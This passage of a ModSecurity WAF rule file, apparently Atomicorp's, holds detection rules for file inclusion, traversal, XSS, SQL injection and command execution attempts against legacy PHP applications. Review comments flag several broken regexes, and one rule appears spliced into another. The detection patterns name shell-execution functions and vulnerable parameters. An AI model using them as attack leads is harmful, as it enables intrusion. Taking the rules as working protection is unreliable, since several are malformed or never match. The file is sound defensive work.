    SecRule REQUEST_URI "\.\./\.\./"
# Rule 310061:rolis guestbook remote file include attempt
# NOTE(review): "php*path=" requires "path=" to follow "ph" plus optional
# "p"s directly, so "/insert.inc.php?path=" does not match. Probably intended
# "/insert\.inc\.php\?.*path=".
SecRule REQUEST_URI "/insert\.inc\.php*path=" "phase:2,id:310061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: guestbook remote file include attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310064: DCP-Portal remote file include attempt
SecRule REQUEST_URI "/library/lib\.php" "phase:2,id:310064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: DCP-Portal remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "root="
# Rules 310067 through 310083 below set no phase of their own; it comes from
# SecDefaultAction.
# Rule 310067: Invision Board emailer.php file include
SecRule REQUEST_URI "/ad_member\.php" "id:310067,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board emailer.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "emailer\.php"
# Rule 310068: WebChat db_mysql.php file include
SecRule REQUEST_URI "/defines\.php" "id:310068,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat db_mysql.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "db_mysql\.php"
# Rule 310069: WebChat english.php file include
SecRule REQUEST_URI "/defines\.php" "id:310069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat english.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "english\.php"
# Rule 310070: Typo3 translations.php file include
SecRule REQUEST_URI "/translations\.php" "id:310070,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "only=\x2e"
# Rule 310072: YaBB SE packages.php file include
SecRule REQUEST_URI "/packages\.php" "id:310072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaBB SE packages.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "packer\.php"
# Rule 310073: newsPHP Language file include attempt
SecRule REQUEST_URI "/nphpd\.php" "id:310073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: newsPHP Language file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "langFile"
# Rule 310075:Invision Board ipchat.php file include
# NOTE(review): same "*"-as-glob problem: "php*root_path*conf_global\.php"
# requires "root_pat", optional "h"s and "conf_global.php" to be adjacent, so
# a real "ipchat.php?root_path=...conf_global.php" never matches.
SecRule REQUEST_URI "/ipchat\.php*root_path*conf_global\.php" "id:310075,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board ipchat.php file include',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310077: PhpGedView PGV functions.php base directory manipulation
# attempt
SecRule REQUEST_URI "(?:functions|_conf|config_gedcom|authentication_index)\.php" "id:310077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpGedView PGV functions.php base directory manipulation attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "pgv_base_directory"
# Rule 310078: TUTOS path disclosure attempt
# Any "id=" in a note_overview.php request is denied -- very broad.
SecRule REQUEST_URI "/note_overview\.php" "id:310078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TUTOS path disclosure attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule REQUEST_URI "id="
# Rule 310083:Calendar XSS
# NOTE(review): the second alternation matches the bare words "about",
# "script", "chrome" etc. anywhere in phpc_root_path, not only inside a tag;
# the "." in "(?:calendar|setup).php" is unescaped (cosmetic).
SecRule REQUEST_URI "/(?:calendar|setup).php" "chain,id:310083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Calendar XSS',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
    SecRule ARGS:phpc_root_path "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:<|script|about|applet|activex|chrome))"
# Rule 
310084:phpMyAdmin Export.PHP File Disclosure Vulnerability SecRule REQUEST_URI "export\.php" "id:310084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin Export.PHP File Disclosure Vulnerability',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:what "\.\." # Rule 310086:More PHPBB worms SecRule REQUEST_URI "/viewtopic\.php\?" "id:310086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB worm',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS "(?:chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(?:(?:[0-9a-fa-fx]{1,3})\)" # Rule 310211: Phorum /support/common.php access SecRule REQUEST_URI "/support/common\.php" "id:310211,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum common.php direct access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310212: rolis guestbook remote file include attempt SecRule REQUEST_URI "/insert\.inc\.php" "id:310212,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Rolis guestbook insert.inc.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "path=" # Rule 310217: Invision Board ipchat.php file include SecRule REQUEST_URI "/ipchat\.php" "id:310217,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Invision Board ipchat.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "conf_global\.php" # Rule 310219: YaBB SE packages.php file include SecRule REQUEST_URI "/packages\.php" "id:310219,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - 
Virtual Just In Time Patch: : YaBB SE packages.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "packer\.php" # Rule 310224: WAnewsletter newsletter.php file inclusion attempt SecRule REQUEST_URI "newsletter\.php" "id:310224,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : WAnewsletter newsletter.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "start\.php" # Rule 310225: Opt-X header.php remote file include attempt SecRule REQUEST_URI "/header\.php" "id:310225,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Opt-X header.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "systempath=" # Rule 310228: Dforum executable code injection attempt SecRule REQUEST_URI "/dforum/nav\.php" "chain,id:310228,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dforum nav.php3 executable code injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:page "<[[:space:]]*(?:script|about|applet|activex|chrome)" # Rule 310229: phpMyAdmin path vln SecRule REQUEST_URI "/css/phpmyadmin\.css\.php" "chain,id:310229,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:globals[cfg][themepath] "(?:/|\.\./)" # Rule 310231: PHPBB full path disclosure SecRule REQUEST_URI "(?:forums?|phpbb)/db/oracle\.php" "id:310231,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB oracle.php full path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310239: phpbb SecRule REQUEST_URI 
"admin/admin_styles\.php\?mode=addnew\&install_to=\.\./\.\./" "id:310239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB admin_styles.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310241: phpAdsNew path disclosure SecRule REQUEST_URI "/libraries/lib-xmlrpcs.inc\.php" "id:310241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew lib-xmlrpcs.inc.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310242: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-activation\.php" "id:310242,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-activation.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310243: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-cleantables\.php" "id:310243,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-cleantables.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310244: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-autotargeting\.php" "id:310244,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-autotargeting.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310245: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-reports\.php" "id:310245,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-reports.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310246: phpAdsNew path disclosure SecRule REQUEST_URI "/misc/backwards\x20compatibility/phpads\.php" 
"id:310246,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility phpads.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310247: phpAdsNew path disclosure SecRule REQUEST_URI "/misc/backwards\x20compatibility/remotehtmlview\.php" "id:310247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility remotehtmlview.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310248: phpAdsNew path disclosure SecRule REQUEST_URI "/misc/backwards\x20compatibility/click\.php" "id:310248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility click.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310253: citrusdb SecRule REQUEST_URI "/citrusdb/tools/uploadcc\.php" "id:310253,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/uploadcc.php credit card data upload attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310262: phpbb XSS SecRule REQUEST_FILENAME "/posting\.php" "chain,id:310262,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:phpbb2mysql_t "(?:\<(?:script|javascript|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310263: phpbb XSS SecRule REQUEST_URI "/posting\.php" "chain,id:310263,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI 
"(?:\<(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310264: phpbb XSS SecRule REQUEST_URI|REQUEST_BODY "/privmsg\.php" "id:310264,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB privmsg.php cross-site-scripting attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI|REQUEST_BODY "\|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310266,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mail_autocheck.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310269: Multiple Vulnerabilities in ProjectBB SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=\&desc=\&pages=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310270: Multiple Vulnerabilities in ProjectBB SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310270,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310271: Multiple Vulnerabilities in ProjectBB SecRule REQUEST_FILENAME "/zip/divers\.php" "chain,id:310271,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB Zip/divers.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" Secrule ARGS:desc "'" # Rule 310272: WebChat english.php or db_mysql.php file include SecRule REQUEST_FILENAME "/defines\.php" 
"chain,id:310272,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat defines.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "(?:db_mysql\.php|english\.php)" # Rule 310273: Cross-Site Scripting Vulnerability in D-Forum SecRule REQUEST_URI "/nav\.php3\?page=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310273,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: D-Forum nav.php3 cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310275: Multiple Vulnerabilities in auraCMS SecRule REQUEST_URI "/hits\.php\?hits=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310275,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA hits.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310276: Multiple Vulnerabilities in auraCMS SecRule REQUEST_URI "/counter\.php\?theCount=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310276,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA counter.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310277: vBulletin Remote Command Execution Attempt SecRule REQUEST_URI "/forumdisplay\.php?[^\r\n]*comma=[^\r\n\x26]*system\x28" "id:310277,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310278: vBulletin Remote Command Execution Attempt SecRule REQUEST_URI "/forumdisplay\.php\?" 
"id:310278,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI|REQUEST_BODY "\.system\(.+\)\." # Rule 310279: vBulletin Remote Command Execution Attempt SecRule REQUEST_URI "/forumdisplay\.php\?*comma=" "id:310279,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310280: PHPNuke general XSS attempt #/modules.php?name=News&file=article&sid=1&optionbox= SecRule REQUEST_URI "/modules\.php\?*name=*\<*(?:script|about|applet|activex|chrome)*\>" "id:310280,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310281: PHPNuke general XSS attempt SecRule REQUEST_URI "/modules\.php\?op=modload&name=News&file=article&sid=*\<*(?:script|about|applet|activex|chrome)*\>" "id:310281,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310282: PHPNuke SQL injection attempt SecRule REQUEST_URI "/modules\.php\?*name=search*instory=" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'" # Rule 310283: PHPNuke SQL injection attempt SecRule REQUEST_FILENAME "/modules.php " "chain,t:none,t:urlDecodeUni,t:lowercase,id:310283,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'" SecRule ARGS:name "(?:search|web_links)" 
"chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" SecRule ARGS "'" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" # Rule 310284: EasyDynamicPages exploit SecRule REQUEST_URI "!(^/livehelp/admin_users_refresh\.php)" "chain,id:310284,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyDynamicPages edp_relative_path exploitation attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "edp_relative_path=" # Rule 310286: phpnuke sql insertion #SecRule REQUEST_URI "/modules\.php*name=forums.*file=viewtopic*/forum=.*\'/" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310286,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'" # Rule 310287: WAnewsletter newsletter.php file include attempt SecRule REQUEST_URI "newsletter\.php*waroot*start\.php" "id:310287,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WAnewsletter newsletter.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310288: Typo3 translations.php file include SecRule REQUEST_URI "/translations\.php*only" "id:310288,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310307: RUNCMS,Exoops,CIAMOS highlight file access hole SecRule REQUEST_URI "/class/debug/highlight\.php\?file=(?:/|\.\./)" "id:310307,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RUNCMS.Exoops.CIAMOS highlight.php file access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310308: TRG/CzarNews News Script Include File Hole Lets Remote users # Execute Arbitrary Commands 
SecRule REQUEST_URI "/install/(?:article|authorall|comment|display|displayall.)\.php\?dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310308,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TRG/CzarNews /install/* local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310309: zpanel XSS #SecRule REQUEST_FILENAME "/zpanel.php" # "chain,id:310309,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: zPanel zpanel.php cross-site-scripting or SQLi attempt'" #SecRule ARGS:page "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|')" # Rule 310311: Phorum http Response Splitting Vulnerability #SecRule REQUEST_URI "/search\.php\?forum_id=.*\&search=.*\&body=.*Content-Length\:.*HTTP/1\.0.*Content-Type\:.*Content-Length\:" # "id:310311,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum search.php http response splitting attempt'" # Rule 310313: PhotoPost Pro SecRule REQUEST_FILENAME "/showgallery\.php" "chain,id:310313,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:page "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|<)" # Rule 310314: PhotoPost Pro SecRule REQUEST_URI "/showgallery\.php\?si=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310315: PhotoPost Pro #SecRule REQUEST_URI "/showgallery\.php\?ppuser=[0-9].*\&cat=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # "id:310315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt'" 
# Rule 310316: PhotoPost Pro #SecRule REQUEST_URI "/showgallery\.php\?(?:cat|ppuser)=[0-9].*\'" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310316,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php SQL injection attempt'" # Rule 310320: Kayako eSupport Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questiondetails\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310321: Kayako eSupport Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questionprint\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310321,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310322: Kayako eSupport Remote Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=troubleshooter\&_c=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310322,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310323: Kayako eSupport Remote Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=subcat\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310323,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310325: phpSysInfo XSS vulns #SecRule REQUEST_URI 
"/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #SecRule REQUEST_URI "/includes/system_footer\.php" # "chain,id:310325,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'" #SecRule ARGS "^\"\>" # Rule 310327: DigitalHive Remote Unathenticated Software Re-install and # Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/base\.php\?page=forum/msg\.php-afs-1-\"/\>\" # "id:310327,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'" # Rule 310328: DigitalHive Remote Unathenticated Software Re-install and # Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/hive/base\.php\?page=membres\.php\&mt=\"/\>\" # "id:310328,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'" # Rule 310329: Topic Calendar Mod for phpBB Cross-Site Scripting Attack SecRule REQUEST_FILENAME "/calendar_scheduler\.php" "chain,id:310329,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB Topic Calendar calendar_scheduler.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:start "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310331: phpSysInfo Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/includes/system_footer\.php\?text.*=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310331,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'" # Rule 310332: phpSysInfo Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI 
"/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'" # Rule 310333: phpSysInfo Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/includes/system_footer\.php\?hide_picklist=.*=\